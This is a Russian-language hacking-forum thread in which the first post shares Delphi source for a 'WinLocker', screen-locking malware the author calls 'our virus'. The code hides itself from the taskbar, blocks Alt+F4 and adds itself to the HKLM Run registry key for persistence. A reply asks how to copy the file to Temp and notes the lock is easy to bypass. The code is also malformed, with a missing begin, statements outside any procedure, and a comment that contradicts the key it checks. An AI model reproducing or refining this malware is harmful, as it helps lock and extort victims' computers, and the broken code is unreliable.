[Статья] WinLocker на Delphi - Zhyk.Ru Forums
Регистрация Главная Пользователи Все разделы прочитаны
Сообщения за день Справка Регистрация

Ответ
 
Опции темы Опции просмотра
Старый 03.04.2017, 01:41   #1
Заблокирован
 Сержант
Аватар для craft1n
 
craft1n блестящий пример для подражанияcraft1n блестящий пример для подражанияcraft1n блестящий пример для подражанияcraft1n блестящий пример для подражанияcraft1n блестящий пример для подражанияcraft1n блестящий пример для подражанияcraft1n блестящий пример для подражанияcraft1n блестящий пример для подражанияcraft1n блестящий пример для подражанияcraft1n блестящий пример для подражанияcraft1n блестящий пример для подражания
Регистрация: 02.08.2016
Сообщений: 124
Популярность: 1739
Сказал(а) спасибо: 2
Поблагодарили 4 раз(а) в 4 сообщениях
Отправить сообщение для craft1n с помощью Skype™
 
Post WinLocker на Delphi

Хотелось бы поделиться исходником винлокера, написанного на Borland Delphi 7:

Delphi код:

Код:
unit Key;

interface

uses

Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,

Dialogs, StdCtrls, jpeg, ExtCtrls;

type

TForm1 = class(TForm)

Image1: TImage;

Label1: TLabel;

procedure FormShow(Sender: TObject);

procedure FormKeyDown(Sender: TObject; var Key: Word;

Shift: TShiftState);

procedure FormCreate(Sender: TObject);

procedure Image1Click(Sender: TObject);

procedure Label1MouseDown(Sender: TObject; Button: TMouseButton;

Shift: TShiftState; X, Y: Integer);

private

{ Private declarations }

public

{ Public declarations }

end;

var

Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.FormShow(Sender: TObject); //программа не отображается в строке виндовс(не знаю, как правильно называется, находится снизу)

begin

ShowWindow(Application.Handle, SW_HIDE);

end;

procedure TForm1.FormKeyDown(Sender: TObject; var Key: Word; //теперь невозможно закрыть наш вирус, нажав CTRL + F4 или SHIFT + F4

Shift: TShiftState);

if (( ssAlt in Shift) and (Key = VK_F4)) then

begin

key:=0;

end;

procedure TForm1.Label1MouseDown(Sender: TObject; Button: TMouseButton; //закрывает окно винлокера по нажатию ПКМ по определенному месту на форме(Label1)

Shift: TShiftState; X, Y: Integer);

begin

if button = mbright then

Application.Terminate

end;

reg := TRegistry.Create();

reg.RootKey := HKEY_LOCAL_MACHINE;

if reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run', True) then //добавляет приложение в автозапуск, дабы его нельзя было закрыть перезагрузкой компьютера

begin

reg.WriteString( Application.Title, Application.ExeName);

reg.CloseKey();

end;

end.
Также в BorderStyle прописываем BSNone
Редактируем форму по своему предпочтению(добавляем картинки и текст)
  Ответить с цитированием
Старый 15.04.2018, 15:55   #2
 Разведчик
Аватар для C1earSky
 
C1earSky никому не известный тип
Регистрация: 14.04.2018
Сообщений: 1
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: WinLocker на Delphi

Как сделать,чтобы файл скопировался в Temp?

Добавлено через 10 часов 31 минуту
Винлокер легко обходится win+d/win/alt+tab

Последний раз редактировалось C1earSky; 16.04.2018 в 02:27. Причина: Добавлено сообщение
  Ответить с цитированием
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

www.webmoney.ru
Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 07:03.

Пишите нам: forum@zhyk.ru
Copyright © 2018 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net